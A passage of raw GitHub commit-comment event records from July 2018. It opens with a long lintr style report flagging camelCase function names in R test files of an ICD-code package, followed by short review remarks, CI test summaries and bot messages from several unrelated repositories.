^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:329:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:331:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:333:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:334:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L334) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:338:20:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L338) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:343:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L343) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:346:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:351:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:358:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L358) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/tests-deprecated/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:147:9:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-util.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:469:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-valid.R#L469) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:474:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-valid.R#L474) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:479:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/tests-deprecated/test-valid.R#L479) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:304:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:305:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L305) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:306:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L306) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:307:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L307) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:308:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L308) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:309:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:315:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L315) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:316:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L316) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:317:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L317) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:318:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L318) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:328:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L328) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:329:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:330:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L330) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:331:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:332:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L332) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:333:18:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:339:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L339) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:341:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L341) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:344:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L344) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:346:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:349:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L349) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:351:5:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)),\n    ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:361:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L361) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:362:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L362) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:366:20:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L366) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:371:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L371) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:374:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L374) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:379:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L379) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:385:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L385) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:386:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L386) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:387:16:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-convert.R#L387) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/testthat/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/testthat/test-util.R:142:9:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-util.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:504:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-valid.R#L504) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:509:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-valid.R#L509) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-valid.R:514:8:](https://github.com/jackwasey/icd/blob/bdad11811f236b6ece4a2a5637f90d8b4db7f70c/tests/testthat/test-valid.R#L514) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T15:06:48Z"}
{"id":"7989796220","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29766136,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T15:07:12Z","updated_at":"2018-07-19T15:07:12Z","author_association":"COLLABORATOR","body":"I don't know why but when I am pulling, it is saying already up to date but these changes are not showing on my repo.\r\n"}},"created_at":"2018-07-19T15:07:12Z"}
{"id":"7989796765","type":"CommitCommentEvent","actor":{"login":"wilbertpol"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29766137,"position":41,"line":402,"path":"src/mame/drivers/vip.cpp","commit_id":"d6c366d8c6a8870f53baf8af44ed0585c5b53e48","created_at":"2018-07-19T15:07:17Z","updated_at":"2018-07-19T15:07:17Z","author_association":"CONTRIBUTOR","body":"you missed removal of a space here and in some more cases below"}},"created_at":"2018-07-19T15:07:17Z"}
{"id":"7989797517","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29766140,"position":null,"line":null,"path":null,"commit_id":"d68322504a53d72eae29dca959936f544f54672a","created_at":"2018-07-19T15:07:24Z","updated_at":"2018-07-19T15:07:24Z","author_association":"CONTRIBUTOR","body":"it is alias in perl-packages.nix\r\n```\r\nLog4Perl = self.LogLog4perl;\r\n```\r\n\r\nso should be treewide replaced to ```LogLog4perl```"}},"created_at":"2018-07-19T15:07:24Z"}
{"id":"7989802075","type":"CommitCommentEvent","actor":{"login":"chapmanb"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29766152,"position":null,"line":null,"path":null,"commit_id":"49d0cbb1f6dcbea629c63749e2f9813bd06dcee3","created_at":"2018-07-19T15:08:06Z","updated_at":"2018-07-19T15:08:06Z","author_association":"MEMBER","body":"Thanks much for the heads up and suggestion. I wasn't positive on this one so left it out, so appreciate you letting me know. It's added now so will be included in the next round of validations. Thanks again."}},"created_at":"2018-07-19T15:08:06Z"}
{"id":"7989806635","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29766162,"position":null,"line":null,"path":null,"commit_id":"fd482beb2462d7f2e8436815f146f232ece327c8","created_at":"2018-07-19T15:08:50Z","updated_at":"2018-07-19T15:08:50Z","author_association":"COLLABORATOR","body":"OK！"}},"created_at":"2018-07-19T15:08:50Z"}
{"id":"7989821170","type":"CommitCommentEvent","actor":{"login":"LancerGreg"},"repo":{"name":"LancerGreg/Snakes"},"payload":{"comment":{"id":29766191,"position":null,"line":null,"path":null,"commit_id":"3d21c6454865fc614c75aed3023e3011a2dd2484","created_at":"2018-07-19T15:11:06Z","updated_at":"2018-07-19T15:11:06Z","author_association":"OWNER","body":"Download me and extract java file"}},"created_at":"2018-07-19T15:11:06Z"}
{"id":"7989825449","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29766200,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T15:11:47Z","updated_at":"2018-07-19T15:11:47Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2983 tests passed, 16 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 4 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n * 5 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T15:11:47Z"}
{"id":"7989826186","type":"CommitCommentEvent","actor":{"login":"thetutlage"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29766203,"position":null,"line":null,"path":null,"commit_id":"4fd16da45ae6b66c8e5a3fa447294c3009723dff","created_at":"2018-07-19T15:11:54Z","updated_at":"2018-07-19T15:11:54Z","author_association":"NONE","body":"Thanks 😄 "}},"created_at":"2018-07-19T15:11:54Z"}
{"id":"7989829493","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/tensorboard-feedstock"},"payload":{"comment":{"id":29766212,"position":null,"line":null,"path":null,"commit_id":"3aa7a8a0185a87d3e3593005a9f08cb19908c206","created_at":"2018-07-19T15:12:25Z","updated_at":"2018-07-19T15:12:25Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @farhantejani were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @farhantejani were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-19T15:12:25Z"}
{"id":"7989832182","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29766220,"position":null,"line":null,"path":null,"commit_id":"4eed82853bbf2e1171971d0d9d80685c47945a06","created_at":"2018-07-19T15:12:52Z","updated_at":"2018-07-19T15:12:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add \"edit\" button to detail pages.](https://trello.com/c/JlMuIiCX/49-add-edit-button-to-detail-pages)"}},"created_at":"2018-07-19T15:12:52Z"}
{"id":"7989833979","type":"CommitCommentEvent","actor":{"login":"eduardpelekh"},"repo":{"name":"eduardpelekh/PushButton_and_LED"},"payload":{"comment":{"id":29766227,"position":null,"line":null,"path":null,"commit_id":"ebdee2d180ab31a3f6688ded6d720b1b9f8e74e0","created_at":"2018-07-19T15:13:09Z","updated_at":"2018-07-19T15:13:09Z","author_association":"OWNER","body":"Photo of arduino schemat"}},"created_at":"2018-07-19T15:13:09Z"}
{"id":"7989835004","type":"CommitCommentEvent","actor":{"login":"burlakilia"},"repo":{"name":"js-tasks-ru/js-20180517_pavel-politaev"},"payload":{"comment":{"id":29766232,"position":24,"line":53,"path":"11-module/1-task/index.js","commit_id":"a3fce00890115f034ce734e42789feba0d42c6f3","created_at":"2018-07-19T15:13:18Z","updated_at":"2018-07-19T15:13:18Z","author_association":"CONTRIBUTOR","body":"Сложный вопрос, тут все зависит от подходов. Если элемент часто меняет своего родителя, но например сам по себе не особо меняется, то практика нормальная\r\n"}},"created_at":"2018-07-19T15:13:18Z"}
{"id":"7989838145","type":"CommitCommentEvent","actor":{"login":"dongsupark"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29766238,"position":4,"line":1098,"path":"cmd/runtimetest/main.go","commit_id":"c29e92cd78e1464ebfc7f7c10844b88e17368b80","created_at":"2018-07-19T15:13:48Z","updated_at":"2018-07-19T15:13:48Z","author_association":"MEMBER","body":"Fixed it to check for an empty string in the mount source path."}},"created_at":"2018-07-19T15:13:48Z"}
{"id":"7989839302","type":"CommitCommentEvent","actor":{"login":"rabadin"},"repo":{"name":"olivergondza/openstack-cloud-plugin"},"payload":{"comment":{"id":29766242,"position":7,"line":56,"path":"src/test/java/jenkins/plugins/openstack/compute/JCloudsComputerTest.java","commit_id":"44d0745031a32e1c4b3bddaee70052c6aa7b057a","created_at":"2018-07-19T15:13:59Z","updated_at":"2018-07-19T15:13:59Z","author_association":"NONE","body":"I'm not sure I understand your change here: the goal is this test is to assert that the node is configured not to accept tasks *as soon* as a build start; now you've changed this to assert that the computer is marked \"pending delete\" *after* the job has run, something which is already tested in `deleteUsedSlaveUponTaskCompletionIfRetentionTimeZero`."}},"created_at":"2018-07-19T15:13:59Z"}
{"id":"7989840177","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29766244,"position":52,"line":52,"path":"pom.xml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-19T15:14:09Z","updated_at":"2018-07-19T15:14:09Z","author_association":"OWNER","body":"Use CivClassics jenkins as repository in your pom for never versions: http://test.civclassic.com:8080/\r\n\r\nDevoteds version history kinda ends where Devoted ended"}},"created_at":"2018-07-19T15:14:09Z"}
